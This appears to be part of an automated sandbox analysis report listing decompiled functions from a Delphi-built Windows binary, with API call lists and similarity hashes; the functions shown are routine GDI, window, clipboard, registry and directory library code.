					_v1038 = __ecx;
					E00402994(_t26, __ecx << 2,  &_v1036);
				} else {
					_push(0);
					L00406A58();
					_t23 = __eax;
					_t18 = SelectObject(__eax, __eax);
					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
					SelectObject(_t23, _t18);
					DeleteDC(_t23);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E00420814(_t32) == 0) {
						E004206A4( &_v1036, _v1038 & 0x0000ffff);
					}
					_t15 = _t32;
					_push(_t15);
					L00406A80();
					_t31 = _t15;
				}
				return _t31;
			}













                                                                                0x004208b7
                                                                                0x004208b9
                                                                                0x004208c1
                                                                                0x004208fb
                                                                                0x00420909
                                                                                0x004208c3
                                                                                0x004208c3
                                                                                0x004208c5
                                                                                0x004208ca
                                                                                0x004208ce
                                                                                0x004208e7
                                                                                0x004208ee
                                                                                0x004208f4
                                                                                0x004208f4
                                                                                0x00420914
                                                                                0x0042091c
                                                                                0x00420932
                                                                                0x00420932
                                                                                0x00420937
                                                                                0x00420939
                                                                                0x0042093a
                                                                                0x0042093f
                                                                                0x0042093f
                                                                                0x0042094c

                                                                                APIs
                                                                                • 72E7A590.GDI32(00000000,00000000,?,?,00424313,?,?,?,?,00422E1F,00000000,00422EAB), ref: 004208C5
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004208CE
                                                                                • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00424313,?,?,?,?,00422E1F), ref: 004208E2
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004208EE
                                                                                • DeleteDC.GDI32(00000000), ref: 004208F4
                                                                                • 72E7A8F0.GDI32(?,00000000,?,?,00424313,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042093A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ObjectSelect$A590ColorDeleteTable
                                                                                • String ID:
                                                                                • API String ID: 1056449717-0
                                                                                • Opcode ID: 482c9c2788b0c37a5b9dfecb9249efeda884aeb6f599fa4f2b036e3790343ac4
                                                                                • Instruction ID: 325484a17df5b14f92a47423d6ed2c50f4fb832cdd6203f9564a378a98e35d35
                                                                                • Opcode Fuzzy Hash: 482c9c2788b0c37a5b9dfecb9249efeda884aeb6f599fa4f2b036e3790343ac4
                                                                                • Instruction Fuzzy Hash: D2019BA130432066E610776A9C47F6B71F88FC1714F41D82FF58AB72C3D57C8854835A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045AE60, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0045AE60(void* __eax) {
				struct tagRECT _v20;
				struct HWND__* _t18;
				void* _t29;
				RECT* _t30;

				_t29 = __eax;
				ValidateRect(E0043BD14(__eax), 0);
				InvalidateRect(E0043BD14(_t29), 0, 0xffffffff);
				GetClientRect(E0043BD14(_t29), _t30);
				_t18 = E0043BD14( *((intOrPtr*)(_t29 + 0x240)));
				MapWindowPoints(E0043BD14(_t29), _t18,  &_v20, 2);
				ValidateRect(E0043BD14( *((intOrPtr*)(_t29 + 0x240))), _t30);
				return InvalidateRect(E0043BD14( *((intOrPtr*)(_t29 + 0x240))),  &_v20, 0);
			}







                                                                                0x0045ae64
                                                                                0x0045ae70
                                                                                0x0045ae81
                                                                                0x0045ae8f
                                                                                0x0045aea1
                                                                                0x0045aeaf
                                                                                0x0045aec1
                                                                                0x0045aee2

                                                                                APIs
                                                                                • ValidateRect.USER32(00000000,00000000,0045B6B4), ref: 0045AE70
                                                                                • InvalidateRect.USER32(00000000,00000000,000000FF,00000000,00000000,0045B6B4), ref: 0045AE81
                                                                                • GetClientRect.USER32 ref: 0045AE8F
                                                                                • MapWindowPoints.USER32 ref: 0045AEAF
                                                                                • ValidateRect.USER32(00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000,0045B6B4), ref: 0045AEC1
                                                                                • InvalidateRect.USER32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000), ref: 0045AED9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Rect$InvalidateValidate$ClientPointsWindow
                                                                                • String ID:
                                                                                • API String ID: 2846033224-0
                                                                                • Opcode ID: 3c2b3297a28a6712cf709c30d3ef4196e5b5ec664aa24e26e9e8547ffadd32af
                                                                                • Instruction ID: b1e37b74211c5b0444d6c631685268bf9646e65aeb1a0234bab0008e2eca243a
                                                                                • Opcode Fuzzy Hash: 3c2b3297a28a6712cf709c30d3ef4196e5b5ec664aa24e26e9e8547ffadd32af
                                                                                • Instruction Fuzzy Hash: 9DF0B2A065430176DA40B6BACC87F4A229C9B4871CF10193E7629FB3C3DA3CE8144EF9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041FF90, Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0041FF90(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041F36C( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041F36C( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041F44C( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0041E68C(E0041F330( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041E68C(E0041F330( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}




                                                                                0x0041ff91
                                                                                0x0041ff9c
                                                                                0x0041ffae
                                                                                0x0041ffbd
                                                                                0x0041fff7
                                                                                0x00420008
                                                                                0x0041ffbf
                                                                                0x0041ffd1
                                                                                0x0041ffe2
                                                                                0x0041ffe2

                                                                                APIs
                                                                                  • Part of subcall function 0041F36C: CreateBrushIndirect.GDI32(?), ref: 0041F416
                                                                                • UnrealizeObject.GDI32(00000000), ref: 0041FF9C
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041FFAE
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041FFD1
                                                                                • SetBkMode.GDI32(?,00000002), ref: 0041FFDC
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041FFF7
                                                                                • SetBkMode.GDI32(?,00000001), ref: 00420002
                                                                                  • Part of subcall function 0041E68C: GetSysColor.USER32(?), ref: 0041E696
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                • String ID:
                                                                                • API String ID: 3527656728-0
                                                                                • Opcode ID: a24b23a3cf2ea92b505d84a07bd1098d24ab30b8c58cd20f8ff859496a66ffca
                                                                                • Instruction ID: ce20360677368ed10bfa08b12ecf4a693c863dce037180e37b3076ca4ee65ff2
                                                                                • Opcode Fuzzy Hash: a24b23a3cf2ea92b505d84a07bd1098d24ab30b8c58cd20f8ff859496a66ffca
                                                                                • Instruction Fuzzy Hash: FEF01DF46001109BCA00FFAAD9C7D4B7BA8AF043097014466B909EF187C979E8654739
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409E74, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00409E74(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;

				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L2:
					_t40 =  *0x487714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409E68(_t73);
					L4:
					E00408BA4( &_v273, 0x104, E0040AC1C(0x5c, _t89) + 1);
					_t74 = 0x409ff4;
					_t86 = 0x409ff4;
					_t83 =  *0x40771c; // 0x407768
					if(E00403740(_t87, _t83) != 0) {
						_t74 = E004047D0( *((intOrPtr*)(_t87 + 4)));
						_t69 = E00408B40(_t74, 0x409ff4);
						if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
							_t86 = 0x409ff8;
						}
					}
					_t51 =  *0x486d9c; // 0x4074dc
					_t16 = _t51 + 4; // 0xffe7
					_t53 =  *0x487714; // 0x400000
					LoadStringA(E00405A84(_t53),  *_t16,  &_v790, 0x100);
					E00403504( *_t87,  &_v1116);
					_v860 =  &_v1116;
					_v856 = 4;
					_v852 =  &_v273;
					_v848 = 6;
					_v844 = _v12;
					_v840 = 5;
					_v836 = _t74;
					_v832 = 6;
					_v828 = _t86;
					_v824 = 6;
					E00409260(_v8,  &_v790, _a4, 4,  &_v860);
					return E00408B40(_v8, _t86);
				}
				_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
				_t89 = _t72;
				if(_t72 != 0) {
					_t75 = _t73 - _v820.AllocationBase;
					__eflags = _t75;
					_v12 = _t75;
					goto L4;
				}
				goto L2;
			}
































                                                                                0x00409e80
                                                                                0x00409e83
                                                                                0x00409e85
                                                                                0x00409e91
                                                                                0x00409ea0
                                                                                0x00409ebe
                                                                                0x00409eca
                                                                                0x00409ed0
                                                                                0x00409edc
                                                                                0x00409eea
                                                                                0x00409f05
                                                                                0x00409f0a
                                                                                0x00409f0f
                                                                                0x00409f16
                                                                                0x00409f23
                                                                                0x00409f2d
                                                                                0x00409f31
                                                                                0x00409f38
                                                                                0x00409f41
                                                                                0x00409f41
                                                                                0x00409f38
                                                                                0x00409f52
                                                                                0x00409f57
                                                                                0x00409f5b
                                                                                0x00409f66
                                                                                0x00409f73
                                                                                0x00409f7e
                                                                                0x00409f84
                                                                                0x00409f91
                                                                                0x00409f97
                                                                                0x00409fa1
                                                                                0x00409fa7
                                                                                0x00409fae
                                                                                0x00409fb4
                                                                                0x00409fbb
                                                                                0x00409fc1
                                                                                0x00409fdd
                                                                                0x00409ff0
                                                                                0x00409ff0
                                                                                0x00409eb5
                                                                                0x00409eba
                                                                                0x00409ebc
                                                                                0x00409ee1
                                                                                0x00409ee1
                                                                                0x00409ee7
                                                                                0x00000000
                                                                                0x00409ee7
                                                                                0x00000000

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409E91
                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EB5
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409ED0
                                                                                • LoadStringA.USER32 ref: 00409F66
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                • String ID: hw@
                                                                                • API String ID: 3990497365-2938629419
                                                                                • Opcode ID: a90f6f03441cbaa7fa0682d0752cfab727030b6a8b25b319f2d74ba5cadffd5c
                                                                                • Instruction ID: 6dfe20bedbac6529fe5b7d32f625191ad228f2dd1b86655df6fb646d007f6676
                                                                                • Opcode Fuzzy Hash: a90f6f03441cbaa7fa0682d0752cfab727030b6a8b25b319f2d74ba5cadffd5c
                                                                                • Instruction Fuzzy Hash: 27412171A002589BDB21DB69CD85BDAB7BC9B08344F0044FAB548F7292D778AF84CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409E72, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00409E72(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t77;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L3:
					_t40 =  *0x487714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409E68(_t74);
				} else {
					_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
					_t101 = _t72;
					if(_t72 != 0) {
						_t77 = _t74 - _v820.AllocationBase;
						__eflags = _t77;
						_v12 = _t77;
					} else {
						goto L3;
					}
				}
				E00408BA4( &_v273, 0x104, E0040AC1C(0x5c, _t101) + 1);
				_t75 = 0x409ff4;
				_t89 = 0x409ff4;
				_t85 =  *0x40771c; // 0x407768
				if(E00403740(_t92, _t85) != 0) {
					_t75 = E004047D0( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00408B40(_t75, 0x409ff4);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x409ff8;
					}
				}
				_t51 =  *0x486d9c; // 0x4074dc
				_t16 = _t51 + 4; // 0xffe7
				_t53 =  *0x487714; // 0x400000
				LoadStringA(E00405A84(_t53),  *_t16,  &_v790, 0x100);
				E00403504( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00409260(_v8,  &_v790, _a4, 4,  &_v860);
				return E00408B40(_v8, _t89);
			}
































                                                                                0x00409e80
                                                                                0x00409e83
                                                                                0x00409e85
                                                                                0x00409e91
                                                                                0x00409ea0
                                                                                0x00409ebe
                                                                                0x00409eca
                                                                                0x00409ed0
                                                                                0x00409edc
                                                                                0x00409ea2
                                                                                0x00409eb5
                                                                                0x00409eba
                                                                                0x00409ebc
                                                                                0x00409ee1
                                                                                0x00409ee1
                                                                                0x00409ee7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409ebc
                                                                                0x00409f05
                                                                                0x00409f0a
                                                                                0x00409f0f
                                                                                0x00409f16
                                                                                0x00409f23
                                                                                0x00409f2d
                                                                                0x00409f31
                                                                                0x00409f38
                                                                                0x00409f41
                                                                                0x00409f41
                                                                                0x00409f38
                                                                                0x00409f52
                                                                                0x00409f57
                                                                                0x00409f5b
                                                                                0x00409f66
                                                                                0x00409f73
                                                                                0x00409f7e
                                                                                0x00409f84
                                                                                0x00409f91
                                                                                0x00409f97
                                                                                0x00409fa1
                                                                                0x00409fa7
                                                                                0x00409fae
                                                                                0x00409fb4
                                                                                0x00409fbb
                                                                                0x00409fc1
                                                                                0x00409fdd
                                                                                0x00409ff0

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409E91
                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EB5
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409ED0
                                                                                • LoadStringA.USER32 ref: 00409F66
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                • String ID: hw@
                                                                                • API String ID: 3990497365-2938629419
                                                                                • Opcode ID: 334110270a560beedd58625548b02213813cd1a699edec738f070ba869cd870d
                                                                                • Instruction ID: 0802fff38336e273a239bb27688692df7ffd8f152fb1f6293fdb009165743f52
                                                                                • Opcode Fuzzy Hash: 334110270a560beedd58625548b02213813cd1a699edec738f070ba869cd870d
                                                                                • Instruction Fuzzy Hash: E2412171A002589BDB21DB59CD85BDAB7BC9B08344F0044FAB548F7292D778AF848F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042EFF0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66clipboardCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E0042EFF0(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				void* __ecx;
				void* __ebp;
				void* _t16;
				void* _t20;
				void* _t24;
				void* _t25;
				signed short _t26;
				void* _t28;
				intOrPtr _t29;
				intOrPtr _t38;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t48;
				intOrPtr _t51;

				_t43 = __edx;
				_v8 = __eax;
				 *((intOrPtr*)( *_v8 + 0x18))(_t42, _t45, _t25, _t28, _t48);
				_push(_t51);
				_push(0x42f092);
				_push( *[fs:edx]);
				 *[fs:edx] = _t51;
				_t26 = EnumClipboardFormats(0);
				_t52 = _t26;
				if(_t26 == 0) {
					L4:
					_t29 =  *0x486a9c; // 0x41ce6c
					E0040A16C(_t29, 1);
					E00403D80();
					__eflags = 0;
					_pop(_t38);
					 *[fs:eax] = _t38;
					return  *((intOrPtr*)( *_v8 + 0x14))(0x42f099);
				} else {
					while(1) {
						_t16 = E00421B64(_t26, _t52);
						_t53 = _t16;
						if(_t16 != 0) {
							break;
						}
						_t26 = EnumClipboardFormats(_t26 & 0x0000ffff);
						__eflags = _t26;
						if(__eflags != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					_t20 = GetClipboardData(_t26 & 0x0000ffff);
					E00421A74(_t43, _t20, _t26, _t53, GetClipboardData(9));
					_t24 = E00403E2C();
					return _t24;
				}
				L6:
			}



















                                                                                0x0042eff7
                                                                                0x0042eff9
                                                                                0x0042f001
                                                                                0x0042f006
                                                                                0x0042f007
                                                                                0x0042f00c
                                                                                0x0042f00f
                                                                                0x0042f019
                                                                                0x0042f01b
                                                                                0x0042f01e
                                                                                0x0042f065
                                                                                0x0042f065
                                                                                0x0042f072
                                                                                0x0042f077
                                                                                0x0042f07c
                                                                                0x0042f07e
                                                                                0x0042f081
                                                                                0x0042f091
                                                                                0x0042f020
                                                                                0x0042f020
                                                                                0x0042f027
                                                                                0x0042f02c
                                                                                0x0042f02e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0042f05e
                                                                                0x0042f060
                                                                                0x0042f063
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0042f063
                                                                                0x0042f034
                                                                                0x0042f049
                                                                                0x0042f04e
                                                                                0x0042f09e
                                                                                0x0042f09e
                                                                                0x00000000

                                                                                APIs
                                                                                • EnumClipboardFormats.USER32(00000000,00000000,0042F092), ref: 0042F014
                                                                                • GetClipboardData.USER32 ref: 0042F034
                                                                                • GetClipboardData.USER32 ref: 0042F03D
                                                                                • EnumClipboardFormats.USER32(00000000,00000000,00000000,0042F092), ref: 0042F059
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Clipboard$DataEnumFormats
                                                                                • String ID: hw@
                                                                                • API String ID: 1256399260-2938629419
                                                                                • Opcode ID: f345650fdc8e6e35028b2a1f76c26e1abfcda7bc9bac7e31b1f0867aab6f8d0f
                                                                                • Instruction ID: d5f3744484d43ec70b7ebc33ac460ba0c135e77aa9ea613b6bd6e2d18685f22f
                                                                                • Opcode Fuzzy Hash: f345650fdc8e6e35028b2a1f76c26e1abfcda7bc9bac7e31b1f0867aab6f8d0f
                                                                                • Instruction Fuzzy Hash: 5011E371B042106FDB00EFB6E852A3BB7E9EFC9758790407BF504D7392D939AC0482A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040342C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 65%
                                                                                			E0040342C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x46b00c & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x46b00c; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x46b00c = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E0040349D);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4034a4);
					return RegCloseKey(_v8);
				}
			}












                                                                                0x0040342d
                                                                                0x0040342f
                                                                                0x00403439
                                                                                0x00403455
                                                                                0x004034a4
                                                                                0x004034b6
                                                                                0x004034b9
                                                                                0x004034c2
                                                                                0x00403457
                                                                                0x00403459
                                                                                0x0040345a
                                                                                0x0040345f
                                                                                0x00403462
                                                                                0x00403465
                                                                                0x00403481
                                                                                0x00403488
                                                                                0x0040348b
                                                                                0x0040348e
                                                                                0x0040349c
                                                                                0x0040349c

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040344E
                                                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403481
                                                                                • RegCloseKey.ADVAPI32(?,004034A4,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403497
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                • API String ID: 3677997916-4173385793
                                                                                • Opcode ID: 72dc0e7b57cfe8bfb1b047d5a70f687c94cba32d7e084e7188c53c41967f2b48
                                                                                • Instruction ID: 3309fe86c7077c7ed47a987fd5adbd923317a9070e71e01c00789b344bd26415
                                                                                • Opcode Fuzzy Hash: 72dc0e7b57cfe8bfb1b047d5a70f687c94cba32d7e084e7188c53c41967f2b48
                                                                                • Instruction Fuzzy Hash: 3601B575510708BAEB12DF91CD02BAABBACDB04B14F2040B6F914E66D0E6B85A10C76D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004028FC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004028FC(void* __eax, void* __edx) {
				char _v271;
				char _v532;
				char _v534;
				char _v535;
				void* _t21;
				void* _t25;
				CHAR* _t26;

				_t25 = __edx;
				_t21 = __eax;
				if(__eax != 0) {
					 *_t26 = 0x40;
					_v535 = 0x3a;
					_v534 = 0;
					GetCurrentDirectoryA(0x105,  &_v271);
					SetCurrentDirectoryA(_t26);
				}
				GetCurrentDirectoryA(0x105,  &_v532);
				if(_t21 != 0) {
					SetCurrentDirectoryA( &_v271);
				}
				return E00404588(_t25, 0x105,  &_v532);
			}










                                                                                0x00402904
                                                                                0x00402906
                                                                                0x0040290a
                                                                                0x00402914
                                                                                0x00402917
                                                                                0x0040291c
                                                                                0x0040292e
                                                                                0x00402934
                                                                                0x00402934
                                                                                0x00402943
                                                                                0x0040294a
                                                                                0x00402954
                                                                                0x00402954
                                                                                0x00402971

                                                                                APIs
                                                                                • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046552B), ref: 0040292E
                                                                                • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046552B), ref: 00402934
